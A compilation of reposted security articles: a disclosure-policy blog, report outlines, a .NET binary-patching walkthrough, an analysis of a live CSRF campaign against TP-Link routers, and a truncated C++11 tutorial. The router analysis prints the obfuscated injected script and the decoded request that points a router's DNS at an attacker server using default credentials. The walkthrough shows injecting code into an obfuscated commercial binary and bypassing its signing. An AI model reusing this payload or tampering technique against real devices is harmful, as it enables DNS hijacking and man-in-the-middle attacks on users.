. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .26 Denial of Teredo service . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .26 Storage-based details . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .26 Relay DOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .27 Server DOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .27 Scanning Teredo addresses compared with native IPv6 addresses . . . . . . . . . . . . . . . . . . . . . . . . . .28 Finding a Teredo address for a host . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .28 Finding any Teredo address for an external IPv4 address . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .29 Finding any Teredo address on the Internet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .29 Scanning difficulties compared . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .30 The effect of Teredo service on worms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .30 Attack pieces . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .31 Getting Teredo components to send packets to third parties . . . . . . . . . . . . . . . . . . . . . . . . . . . . .31 Inducing a client to make external connections . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .31 Selecting a relay via source routing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .32 Finding the IPv4 side of an IPv6 node’s relay . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .32 Teredo mitigation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .32 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .34 Future work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .35 Acknowledgments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .35 References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .36 Download: http://www.symantec.com/avcenter/reference/Teredo_Security.pdf
-
Disclosure of Vulnerabilities and Exploit Code is an Essential Capability Posted by Darren Meyer in RESEARCH, October 30, 2013 Robert Lemos has an excellent summary of the state of the debate on disclosure of exploit code in his column at Dark Reading. In it, I’m quoted briefly: Software vulnerabilities are often discovered independently, suggesting that silencing the disclosure of a vulnerability and how to exploit the flaw would merely allow a bad actor more time to use an attack, says Darren Meyer, senior security researcher at Veracode, an application security firm. “It is really important for the disclosure, or even the release of code, to be a possibility,” he says. “The legal restraint of that would be a very bad practice.” But that’s really only part of the story — disclosure is a complicated topic. It’s easy to understand the point of view of a defender: details of a specific vulnerability or even example exploit code are scary. Their existence means you as a defender have a very short period of time to react, you have to prioritize that fix instead of rolling it into a planned update, because attackers now have a ready-made path to attack you. These concerns are exactly why Veracode takes such pains to keep the vulnerabilities we discover in our customers’ applications confidential. It’s just as easy to understand the point of view of a researcher: their reputations—and thus their livelihoods—depend upon their ability to discover and document vulnerabilities. If they can’t share this information, it becomes very hard for the community and industry to evaluate their abilities objectively. Additionally, the sharing of information about vulnerabilities is essential to advancing the state of the art of defense. We learn from each other, and we apply that knowledge to better defenses. Both sets of concerns are valid. It would be a detrimental to security if every vulnerability discovered were immediately disclosed along with a working exploit. It would be just as bad if researchers were constrained from ever sharing their findings. After all, we’re on the same side—we all want higher-quality software. Fortunately for us, there are various approaches to responsible disclosure, all of which have a few key attributes: The vulnerability is disclosed first to people who have the ability to repair it The details are kept confidential for a reasonable and agreed upon period of time to allow the vulnerable party to engineer and properly test and deploy a fix Once the vulnerability is fixed (or once a reasonable time to fix has passed), the researcher publishes the details This general framework for responsibly disclosing vulnerabilities strikes an excellent balance among the various concerns of defender, researcher, and user. The defender is given an opportunity to benefit from the researcher’s findings. But using this method also allows them to treat the vulnerability like other production defects: it can be appropriately prioritized, the fix can be engineered soundly, and the system can be thoroughly tested before the fix is deployed. Being able to treat a security flaw with the same QA measures as any other production defect results in higher-quality software. At the same time, unaffected defenders are able to learn from the mistakes of others and avoid them in their own systems. This makes everyone safer. The researcher retains his or her ability to share important findings with the research and defense communities, advancing the state of the art in research and defense and providing useful opportunities for further academic study. He or She also retains the leverage of disclosure as a way to ensure that the vulnerable party takes the issue seriously—the vulnerability will be disclosed, and so it must be repaired. Each user of the system comes out ahead as well. Ideally, they get to see that a vulnerability was discovered and repaired by learning about the vulnerability after the fix is already in place. And if not, they can trust that they’ll learn about a vulnerability that affects them should the defender fail in their duty to repair it.On top of that, the user benefits from the better defenses that result from information about vulnerabilities being publicly available. Responsible disclosure of vulnerabilities—including the details and even example exploits—simply works for everyone. Sursa: https://www.veracode.com/blog/2013/10/disclosure-of-vulnerabilities-and-exploit-code-is-an-essential-capability/
-
The! DEFCON21 Social Engineer Capture The Flag Report Table&of&Contents&........................................................................................................................................................................&2! Executive&Summary&...................................................................................................................................................................&3! Overview&of&the&SECTF&............................................................................................................................................................&4! Background!and!Description!................................................................................................................!4! Description!of!the!2013!Parameters!....................................................................................................!6! Target!Companies!................................................................................................................................!6! Competitors!.........................................................................................................................................!7! Flags!.....................................................................................................................................................!7! Scoring!.................................................................................................................................................!9! Rules!of!Engagement!(R.O.E)!...............................................................................................................!9! Results?&Analysis&..............................................................................................................................................................&10! Open!Source!Information!Gathering!.................................................................................................!11! Pretexting!..........................................................................................................................................!14! Live!Call!Performance!........................................................................................................................!16! Final!Contest!Results!..........................................................................................................................!19! Discussion!..........................................................................................................................................!22! Mitigation!..........................................................................................................................................!23! 1.!Corporate!Information!Handling!and!Social!Media!Policies!..........................................................!23! 2.!Consistent,!Real!World!Education!.................................................................................................!24! 3.!Regular!Risk!Assessment!and!Penetration!Test!.............................................................................!24! About&SocialDEngineer,&Inc&..................................................................................................................................................&25! Sponsors&......................................................................................................................................................................................&26 Download: http://www.social-engineer.org/defcon21/DC21_SECTF_Final.pdf
-
.NET: Binary Modification Walkthrough As I kept promising but failing to do, as I am an unregenerate procrastinator, here is a step-by-step of the binary modification I demonstrated during my Summercon, NordicSec, and Brucon talks. I chose Red Gate Reflector for my target app– partly for the “Yo dawg”/ Inception jokes, and partly because, as we’ll see later in this blog post, the folks at Red Gate seem to have a bit of a sense of humor about such things. As with most binaries you’ll end up working with, Reflector is obfuscated. The obfuscation used here is SmartAssembly– not surprising, since this is Red Gate’s obfuscation product. This is easily confirmed using de4dot deobfuscator: >de4dot.exe -d "C:\Program Files(x86)\Red Gate\.NET Reflector\Desktop 8.0\Reflector.exe" de4dot v2.0.3.3405 Copyright (C) 2011-2013 de4dot@gmail.com Latest version and source code: https://bitbucket.org/0xd4d/de4dot Detected SmartAssembly 6.6.0.147 (C:\Program Files (x86)\Red Gate\.NET Reflector\Desktop 8.0\Reflector.exe) Opening the binary in Reflector in its original state, we can clearly see signs of obfuscation. Symbols have been renamed to garbage characters and methods cannot be displayed. Some, however, have their original names. Well played, Red Gate. I dub this the “RedRoll.” Running the app through de4dot improves the readability somewhat and reverts the binary enough that methods can be resolved. However, since the original symbol data has not been stored, the deobfuscator is forced to assign generic names: Now that we have a deobfuscated binary, we can start to analyze and modify it. I’ve been relying on two add-ons to make this easier: CodeSearch (as Red Gate’s native search functionality is somewhat lacking,) and Reflexil (for assembly modification.) For this demonstration, I decided to modify Reflector to add some functionality that I felt was sorely lacking. My goal is to introduce new code into the binary and add a toolbar icon to launch it. Since we mostly have generic symbols to work with, it’s going to be a bit more of a challenge to identify where existing functionality is implemented as well as where to inject our own code. When analyzing a binary, it helps start with a list of goals, or at the very least touchpoints that you wish to reach. This list will undoubtedly change as you become more familiar with the app; however, it will help provide structure to your analysis. This especially helps if, like me, you tend to jump around haphazardly as new ideas pop in your head. For this particular undertaking, I fleshed out the following steps: Identify where toolbar icons are created and add icon representing the new functionality I’ll add Identify where toolbar icons are linked to the functionality/functions they invoke Insert an assembly reference to a DLL I’ve created into the application Create a new function inside Reflector invoking the functionality implemented in my DLL Link my tool icon to my own function Because symbol renaming was one of the obfuscation techniques performed on this binary, locating the toolbar implementation will require a little digging, but not much. By searching for one of the strings displayed when mousing over a toolbar icon, “Assembly Source Code…,” I was able to determine the toolbar is implemented in Class269.method_26(). Making an educated guess from the code above, the toolbar is created by various calls to Class269.method_29(), passing in the toolBar, the image icon, the mouse over text, keybindings, and a string referring to the function invoked when the icon is clicked. In order to add my own toolbar icon, I’ll need to add another of these calls. This can be done using Reflexil to inject the IL code equivalent, as seen below: The IL written to add the appropriate call is: IL_01ae: ldarg.0 IL_01af: ldarg.1 IL_01b0: call class [System.Drawing]System.Drawing.Image ns36.Class476::get_Nyan() IL_01b5: ldstr "Nyan!" IL_01ba: ldc.i4.0 IL_01bb: ldstr "Application.Nyan" IL_01c0: call instance void ns30.Class269::method_29(class Reflector.ICommandBar, class [System.Drawing]System.Drawing.Image, string, valuetype [System.Windows.Forms]System.Windows.Forms.Keys, string) IL_01c5: ldarg.1 IL_01c6: callvirt instance class Reflector.ICommandBarItemCollection Reflector.ICommandBar::get_Items() IL_01cb: callvirt instance class Reflector.ICommandBarSeparator Reflector.ICommandBarItemCollection::AddSeparator() IL_01d0: pop PROTIP: If you’re lost on what IL instructions to add, try writing a test app in C# or VB .NET, then use the Disassembly Window in Visual Studio or the IL view in Reflector to see the equivalent IL. You can see that in this IL, I make a call to ns36.Class476::get_Nyan(). This is a function that I’ll create that returns a System.Drawing.Image object representing the icon to be displayed in the toolbar. I’ll also need to find out where to associate the “Application.Nyan” string with the function that actually calls the functionality I wish to invoke. Doing a bit of digging into the Class476 functions, I end up determining that they are returning the images by slicing off 16×16 portions of CommandBar16.png. This means that I can add my toolbar icon to this image, which lives in the Resources section of the binary, and carve it off as well: I can then add the get_Nyan() function, modeling it off of the other image-carving functions in Class476. .method public hidebysig specialname static class [System.Drawing]System.Drawing.Image get_Nyan()cilmanaged { .maxstack 2 .locals init ( [0] class [System.Drawing]System.Drawing.Image image) L_0000: ldsfld class [System.Drawing]System.Drawing.Image[] ns36.Class476::image_0 L_0005: ldc.i4.s 40 L_0007: ldelem.ref L_0008: stloc.0 L_0009: leave.s L_000b L_000b: ldloc.0 L_000c: ret } With that done, I need to find where those pesky strings are linked to actual function calls. By searching for one of the strings (“Application.OpenFile,”) I find it referenced in two functions that look promising– Execute() and QueryStatus() Looking inside Class269.Execute, I see that this function creates a dictionary mapping these strings to function calls. public void Execute(string commandName) { string key = commandName; if (key != null) { int num; if (Class722.dictionary_4 == null) { Dictionary<string, int> dictionary1 = new Dictionary<string, int>(0x10); dictionary1.Add("Application.OpenFile", 0); dictionary1.Add("Application.OpenCache", 1); dictionary1.Add("Application.OpenList", 2); dictionary1.Add("Application.CloseFile", 3); … Class722.dictionary_4 = dictionary1; } if (Class722.dictionary_4.TryGetValue(key, out num)) { switch (num) { case 0: this.method_45(); break; case 1: this.method_46(); break; case 2: this.method_47(); break; … } QueryStatus() is structured in much the same way. I add my own dictionary entry mapping “Application.Nyan” to the function nyan() with the following IL to add the dictionary key… IL_00d5: dup IL_00d6: ldstr "Application.Nyan" IL_00db: ldc.i4.s 16 IL_00dd: call instance void class [mscorlib]System.Collections.Generic.Dictionary`2<string, int32>::Add(!0, !1) …and the function mapping: IL_01c0: ldarg.0 IL_01c1: call instance void ns30.Class269::nyan() IL_01c6: leave.s IL_01c8 You’ll notice above that I reference a function called nyan(). This is the function I’ll use that will implement the functionality the icon click will invoke. I could write this functionality entirely in IL, but I’m actually not much of a masochist. What I decided to do instead was to write a DLL containing the functionality I wanted. This assembly, derp.dll, was added as an assembly reference as follows: I can then insert IL for the nyan() function into Class269: .method private hidebysig instance void nyan() cil managed { .maxstack 8 L_0000: newobj instance void [derp]derp.hurr::.ctor() L_0005: callvirt instance void [derp]derp.hurr::showForm() L_000a: ret } This is about all the modification needed, but now I need to address the Strong Name Signing on the binary, otherwise I will not be able to save and execute these changes. There are various tutorials on this subject, but for the purposes of this project I simply enabled Strong Name bypass for this application, as is described here. Reflexil will also allow you to do this upon saving the modified binary. With the binary saved, I can now launch it. Now, if anything has been done incorrectly, your application will crash with a .NET runtime error either when you launch it or when trying to invoke the new functionality. For this reason, I saved my work and checked that it executed properly periodically throughout the process above. Below shows my new toolbar icon and the result of clicking it: I feel that Nyan mode greatly enhances the Reflector user experience and hope that RedGate will consider adding it to a future release. Sursa: .NET: Binary Modification Walkthrough | I am not interesting enough to have a blog.
-
Real-World CSRF attack hijacks DNS Server configuration of TP-Link routers Introduction Analysis of the exploit Analysis of the CSRF payload Consequences of a malicious DNS server Prevalence of the exploit Recommendations to mitigate the problem Affected Devices References Introduction Today the majority of wired Internet connections is used with an embedded NAT router, which allows using the same Internet connection with several devices in parallel and also provides some protection against incoming attacks from the Internet. Most of these routers can be configured via a web interface. Unfortunately many of these web interfaces suffer from common web application vulnerabilities such as CSRF, XSS, insecure authentication and session management or command injection. In the past years countless vulnerabilities have been discovered and publicly reported. Many of them have remained unpatched by vendors and even if a patch is available, it is typically only installed to a small fraction of the affected devices. Despite these widespread vulnerabilities there have been very few public reports of real-world attacks against routers so far. This article exposes an active exploitation campaign against a known CSRF vulnerability (CVE-2013-2645) in various TP-Link routers. When a user visits a compromised website, the exploit tries to change the upstream DNS server of the router to an attacker-controlled IP address, which can then be used to carry out man-in-the-middle attacks. Analysis of the exploit This section describes one occurrence of the exploit. I have seen five different instances of the exploit on unrelated websites so far and the details of the obfuscation differ between them. However, the actual requests generated by the exploits are the same except for the DNS server IP addresses. As you would expect for malicious content added to a website the exploit is hidden in obfuscated javascript code. The first step is a line of javascript appended to a legitimate javascript file used by the website: document.write("<script type=\"text/javascript\" src=\"http://www.[REDACTED].com/js/ma.js\">"); It is possible that the cybercrooks append this line to various javascript files on compromised web servers in an automated way. This code just dynamically adds a new script tag to the website in order to load further javascript code from an external server. The referenced file “ma.js” contains the following encoded javascript code: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('T w$=["\\E\\6\\5\\m\\o\\3\\q\\5\\m\\8\\3\\7\\"\\5\\3\\G\\5\\j\\r\\6\\6\\"\\y\\B\\d\\e\\8\\v\\4\\5\\q\\u\\4\\o\\H\\n\\5\\5\\8\\A\\j\\j\\a\\i\\e\\d\\f\\A\\a\\i\\e\\d\\f\\B\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\j\\u\\6\\3\\4\\z\\8\\e\\j\\s\\a\\f\\F\\n\\r\\8\\C\\3\\4\\l\\3\\4\\z\\8\\e\\1\\n\\5\\e\\I\\i\\n\\r\\8\\6\\3\\4\\l\\3\\4\\7\\2\\c\\d\\8\\2\\7\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\b\\b\\c\\d\\8\\h\\7\\2\\k\\h\\1\\2\\g\\9\\1\\2\\1\\2\\k\\k\\c\\s\\3\\a\\6\\3\\7\\2\\h\\b\\c\\Q\\a\\5\\3\\x\\a\\m\\7\\b\\1\\b\\1\\b\\1\\b\\c\\i\\v\\e\\a\\d\\f\\7\\c\\i\\f\\6\\6\\3\\4\\l\\3\\4\\7\\2\\b\\g\\1\\2\\9\\P\\1\\D\\g\\1\\9\\R\\c\\i\\f\\6\\6\\3\\4\\l\\3\\4\\h\\7\\9\\1\\9\\1\\9\\1\\9\\c\\C\\a\\l\\3\\7\\p\\t\\2\\p\\S\\D\\O\\p\\t\\K\\p\\J\\g\\L\\N\\E\\j\\6\\5\\m\\o\\3\\y\\q"];M["\\x\\4\\d\\5\\3\\o\\f"](w$[0]);',56,56,'|x2e|x31|x65|x72|x74|x73|x3d|x70|x38|x61|x30|x26|x69|x6d|x6e|x36|x32|x64|x2f|x39|x76|x79|x68|x6c|x25|x20|x63|x4c|x42|x75|x6f|_|x77|x3e|x52|x3a|x40|x53|x33|x3c|x44|x78|x28|x3f|x45|x34|x29|document|x3b|x2b|x37|x67|x35|x41|var'.split('|'),0,{})) At first this code looks quite complicated and you probably don’t want to manually analyze and decode it. However, it is clearly visible that the file just contains one big eval call. The parameter to eval (the code which is executed) is dynamically computed by an anonymous function based on the parameters p,a,c,k,e,d. A little bit of googling for “eval(function(p,a,c,k,e,d)” shows that this is the result of a publicly available javascript obfuscator. There are several online javascript deobfuscators you can use to reverse engineer the packed javascript. Alternatively, you can also just replace “eval” with “console.log” and then paste the code to the javascript console of Chrome Developer Tools. This just prints out the decoded javascript, which would otherwise be passed to eval. The result of the decoding is the following code: var _$ = ["\x3c\x73\x74\x79\x6c\x65\x20\x74\x79\x70\x65\x3d\"\x74\x65\x78\x74\x2f\x63\x73\x73\"\x3e\x40\x69\x6d\x70\x6f\x72\x74\x20\x75\x72\x6c\x28\x68\x74\x74\x70\x3a\x2f\x2f\x61\x64\x6d\x69\x6e\x3a\x61\x64\x6d\x69\x6e\x40\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x2f\x75\x73\x65\x72\x52\x70\x6d\x2f\x4c\x61\x6e\x44\x68\x63\x70\x53\x65\x72\x76\x65\x72\x52\x70\x6d\x2e\x68\x74\x6d\x3f\x64\x68\x63\x70\x73\x65\x72\x76\x65\x72\x3d\x31\x26\x69\x70\x31\x3d\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x30\x26\x69\x70\x32\x3d\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x39\x39\x26\x4c\x65\x61\x73\x65\x3d\x31\x32\x30\x26\x67\x61\x74\x65\x77\x61\x79\x3d\x30\x2e\x30\x2e\x30\x2e\x30\x26\x64\x6f\x6d\x61\x69\x6e\x3d\x26\x64\x6e\x73\x73\x65\x72\x76\x65\x72\x3d\x31\x30\x36\x2e\x31\x38\x37\x2e\x33\x36\x2e\x38\x35\x26\x64\x6e\x73\x73\x65\x72\x76\x65\x72\x32\x3d\x38\x2e\x38\x2e\x38\x2e\x38\x26\x53\x61\x76\x65\x3d\x25\x42\x31\x25\x41\x33\x2b\x25\x42\x34\x25\x45\x36\x29\x3b\x3c\x2f\x73\x74\x79\x6c\x65\x3e\x20"]; document["\x77\x72\x69\x74\x65\x6c\x6e"](_$[0]); Although this code is still obfuscated, it can easily be understood by decoding the hex-encoded strings. The string “\x77\x72\x69\x74\x65\x6c\x6e” is the hex-encoded version of “writeln” and given the way object oriented programming in javascript works the line ‘document["\x77\x72\x69\x74\x65\x6c\x6e"](_$[0]);’ is just a fancy way of writing ‘document.writeln(_$[0]);’. The array element _$[0] contains the stuff which is written to the document and after decoding the escaped hex characters you get the following equivalent code: document.writeln('<style type="text/css">@import url(http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=106.187.36.85&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6);</style>') So the obfuscated javascript adds a style tag to the current html document. The css in this style tag uses @import to instruct the browser to load additional css data from 192.168.1.1, which is the default internal IP address of most NAT routers. So it is obviously a CSRF attack which tries to reconfigure the router. The following section shows an analysis of what the request does with some TP-Link routers. Analysis of the CSRF payload It is obvious that the payload tries to reconfigure the options for the DHCP server included in the router at 192.168.1.1. While the parameters also include the start/end of the DHCP ip address range, the main purpose of the exploit is to change the primary DNS server to 106.187.36.85. The secondary nameserver points to a publicly available recursive DNS server (in this case the public DNS server provided by Google) in order to make sure that the user doesn’t notice any connectivity problems in case the attacker-controlled nameserver is (temporarily) unavailable for any reason. Searching for the string “userRpm/LanDhcpServerRpm” quickly revealed that the exploit is targeting TP-Link routers. The fact that some TP-Link routers are vulnerable to CSRF attacks has already been publicly reported [1] by Jacob Holcomb in April 2013 and TP-Link has fixed this problem for some devices since then. Experiments have shown that several TP-Link routers are actually vulnerable to this CSRF attack (see below for an incomplete list of affected devices). It is also worth noting that a web server should use POST instead of GET for all actions doing persistent changes to the router. This can protect against attacks in some scenarios where the attacker can only trigger loading a given URL e.g. by posting an image to a public discussion board or sending an HTML email (which could also be used to trigger attacks like this if the victim has enabled loading of remote images). However, even a POST request to the router can be issued in an automated way if the attacker can execute javascript code in the client browser. So in order to further protect against CSRF the server should either add a securely generated CSRF token or use strict referer checking (which is easier to implement on embedded devices). The affected TP-Link routers use HTTP Basic Authentication to control access to the web interface. When entering the credentials to access the web interface, the browser typically asks the user whether he wants to permanently store the password in the browser. However, even if the user doesn’t want to permanently store the password in the browser, it will still temporarily remember the password and use it for the current session. Since the session is only controlled by the browser behavior, the router can’t actively terminate the session e.g. after a certain timeout or when clicking a logout button. Due to this limitation of HTTP Basic Authentication the configuration web interface has no logout button at all and the only way to terminate the session is closing and reopening the browser. The CSRF exploit also includes the default credentials (username=admin, password=admin) in the URL. However, even if a username/password combination is given in the URL, the browser will ignore the credentials from the URL and still try the saved credentials or no authentication first. Only if this results in an HTTP 401 (Unauthorized) status code, the browser resends the request with the credentials from the URL. Due to this browser behavior the exploit works if the user is either logged in to the router or if the standard password hasn’t been changed. Consequences of a malicious DNS server When an attacker has changed the upstream DNS server of a router, he can then carry out arbitrary man-in-the-middle attacks against users of the compromised router. Here is a list of several possible actions which can be carried out by redirecting certain dns hostnames to an attacker server: * Redirect users to phishing sites when opening a legitimate website * Redirect users to browser exploits * Block software upgrades * Attacking software updaters which don’t use cryptographic signatures * Replace advertisements on websites by redirecting adservers (that’s what the dnschanger malware did [2]) * Replace executable files downloaded from the official download site of legitimate software vendors * Hijack email accounts by stealing the password if the mail client doesn’t enforce usage of TLS/SSL with a valid certificate * Intercept communication between Android/IOS Apps and their back end infrastructure As of now I do not know what kind of attacks the cybercrooks do with the malicious DNS servers. I have done some automated checks and resolved a large number of popular domain names with one of the DNS servers used for the attack and compared the results against a self-hosted recursive resolver. Due to the prevalence of round-robin load-balancing on DNS level and location-dependent redirection used e.g. by CDNs (content delivery networks) this automated comparison did result in a huge number of false positives and due to time constraints I could only manually verify those IP addresses which appear for a significant number of different hostnames. None of them turned out to be a malicious manipulation. However, it is very well possible that the infected routers are used for targeted attacks against a limited number of websites. If you find out what kind of attacks are carried out using the malicious DNS servers, please drop me an email or leave a comment in my blog. Prevalence of the exploit I discovered this exploitation campaign with an automated client honeypot system. Until now I spotted the exploit five times on totally unrelated websites. During that time the honeypot was generating some 280 GB of web traffic. The were some differences in the obfuscation used for the exploit but the actual CSRF requests generated are basically the same. The five instances of the exploit tried to change the primary nameserver to three different IP addresses and it is likely that there are more of them which I haven’t spotted so far. Recommendations to mitigate the problem If you are using an affected TP-Link router, you should perform the following steps to prevent it from being affected by this exploit: * Check whether the DNS servers have already been changed in your router * Upgrade your router to the latest firmware. The vulnerability has already been patched at least for some devices * If you don’t get an upgrade for your model from TP-Link, you may also check whether it is supported by OpenWRT * Change the default password to something more secure (if you haven’t already done so) * Don’t save your router password in the browser * Close all other browser windows/tabs before logging in to the router * Restart your browser when you’re finished using the router web interface (since the browser stores the password for the current browser session) Affected Devices I have already checked some TP-Link routers I had access to whether they are vulnerable to the attack. Some devices do contain the vulnerability but are by default not affected by the exploits I’ve seen so far because they are not using the IP address 192.168.1.1 in the default configuration. TP-Link WR1043ND V1 up to firmware version 3.3.12 build 120405 is vulnerable (version 3.3.13 build 130325 and later is not vulnerable) TP-Link TL-MR3020: firmware version 3.14.2 Build 120817 Rel.55520n and version 3.15.2 Build 130326 Rel.58517n are vulnerable (but not affected by current exploit in default configuration) TL-WDR3600: firmware version 3.13.26 Build 130129 Rel.59449n and version 3.13.31 Build 130320 Rel.55761n are vulnerable (but not affected by current exploit in default configuration) WR710N v1: 3.14.9 Build 130419 Rel.58371n is not vulnerable It is likely that some other devices are vulnerable as well. If you want to know whether your router is affected by this vulnerability, you can find it out by performing the following steps: 1. Open a browser and log in to your router 2. Navigate to the DHCP settings and note the DNS servers (it may be 0.0.0.0, which means that it uses the DNS server from your router’s upstream internet connection) 3. Open a new browser tab and visit the following URL (you may have to adjust the IP addresses if your router isn’t using 192.168.1.1): http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.4.4&dnsserver2=8.8.8.8&Save=%B1%A3+%B4%E6 If your router is vulnerable, this changes the DNS servers to 8.8.4.4 and 8.8.8.8 (the two IP addresses from Google Public DNS). Please note that the request also reverts the DHCP IP range and lease time to the default value. 4. Go back to the first tab and reload the DHCP settings in the router web interface 5. If you see the servers 8.8.4.4 and 8.8.8.8 for primary and secondary DNS, your router is vulnerable. 6. Revert the DNS settings to the previous settings from step 2 7. If your router is vulnerable, you may also upgrade it to the latest firmware and check whether it is still vulnerable. Feel free to drop me an email or post a comment with your model number and firmware version so that I can add the device to the list above. References [1]: TP-LINK WR1043N Hacked, Rooted [2]: https://en.wikipedia.org/wiki/DNSChanger This entry was posted in Security by Jakob. Sursa: Real-World CSRF attack hijacks DNS Server configuration of TP-Link routers | Jakob Lell's Blog
-
C++11 Tutorial: Explaining the Ever-Elusive Lvalues and Rvalues October 30, 2013 by Danny Kalev Every C++ programmer is familiar with the terms lvalue and rvalue. It’s no surprise, since the C++ standard uses them “all over”, as do many textbooks. But what do they mean? Are they still relevant now that C++11 has five value categories? It’s about time to clear up the mystery and get rid of the myths. Lvalues and rvalues were introduced in a seminal article by Strachey et al (1963) that presented CPL. A CPL expression appearing on the left hand side of an assignment expression is evaluated as a memory address into which the right-hand side value is written. Later, left-hand expressions and right-hand expressions became lvalues and rvalues, respectively. One of CPL’s descendants, B, was the language on which Dennis Ritchie based C. Ritchie borrowed the term lvalue to refer to a memory region to which a C program can write the right hand side value of an assignment expression. He left out rvalues, feeling that lvalue and “not lvalue” would suffice. Later, rvalue made it into K&R C and ISO C++. C++11 extended the notion of rvalues even further by letting you bind rvalue references to them. Although nowadays lvalue and rvalues have slightly different meanings from their original CPL meanings, they are encoded “in the genes of C++,” to quote Bjarne Stroustrup. Therefore, understanding what they mean and how the addition of move semantics affected them can help you understand certain C++ features and idioms better –– and write better code. Right from Wrong Before attempting to define lvalues, let’s look at some examples: int x=9; std::string s; int *p=0; int &ri=x; The identifiers x, s, p and ri are all lvalues. Indeed, they can appear on the left-hand side of an assignment expression and therefore seem to justify the CPL generalization: “Anything that can appear on the left-hand side of an assignment expression is an lvalue.” However, counter-examples are readily available: void func(const int * pi, const int & ri) { *pi=7;//compilation error, *pi is const ri=8; //compilation error, ri is const } *pi and ri are const lvalues. Therefore, they cannot appear on the left-hand side of an expression after their initialization. This property doesn’t make them rvalues, though. Now let’s look at some examples of rvalues. Literals such as 7, ‘a’, false and “hello world!” are instances of rvalues: 7==x; char c= 'a'; bool clear=false; const char s[]="hello world!"; Another subcategory of rvalues is temporaries. During the evaluation of an expression, an implementation may create a temporary object that stores an intermediary result: int func(int y, int z, int w){ int x=0; x=(y*z)+w; return x ; } In this case, an implementation may create a temporary int to store the result of the sub-expression y*z. Conceptually, a temporary expires once its expression is fully evaluated. Put differently, it goes out of scope or gets destroyed upon reaching the nearest semicolon. You can create temporaries explicitly, too. An expression in the form C(arguments) creates a temporary object of type C: cout<<std::string ("test").size()<<endl; Contrary to the CPL generalization, rvalues may appear on the left-hand side of an assignment expression in certain cases: string ()={"hello"}; //creates a temp string You’re probably more familiar with the shorter form of this idiom: string("hello"); //creates a temp string Clearly, the CPL generalization doesn’t really cut it for C++, although intuitively, it does capture the semantic difference between lvalues and rvalues. So, what do lvalues and rvalues really stand for? A Matter of Identity An expression is a program statement that yields a value, for example a function call, a sizeof expression, an arithmetic expression, a logical expression, and so on. You can classify C++ expressions into two categories: values with identity and values with no identity. In this context, identity means a name, a pointer, or a reference that enable you to determine if two objects are the same, to change the state of an object, or copy it: struct {int x; int y;} s; //no type name, value has id string &rs= *new string; const char *p= rs.data(); s, rs and p are identities of values. We can draw the following generalization: lvalues in C++03 are values that have identity. By contrast, rvalues in C++03 are values that have no identity. C++03 rvalues are accessible only inside the expression in which they are created: int& func(); int func2(); func(); //this call is an lvalue func2(); //this call is an rvalue sizeof(short); //rvalue new double; //new expressions are rvalues S::S() {this->x=0; /*this is an rvalue expression*/} A function’s name (not to be confused with a function call) is an rvalue expression that evaluates to the function’s address. Similarly, an array’s name is an rvalue expression that evaluates to the address of the first element of the array: int& func3(); int& (*pf)()=func3;//func3 is an rvalue int arr[2]; int* pi=arr;//arr is an rvalue Because rvalues are short-lived, you have to capture them in lvalues if you wish to access them outside the context of their expression: std::size_t n=sizeof(short); double *pd=new double; struct S { int x, y; S() { S *p=this; p->x=0; p->y=0;} }; Remember that any expression that evaluates to an lvalue reference (e.g., a function call, an overloaded assignment operator, etc.) is an lvalue. Any expression that returns an object by value is an rvalue. Prior to C++11, identity (or the lack 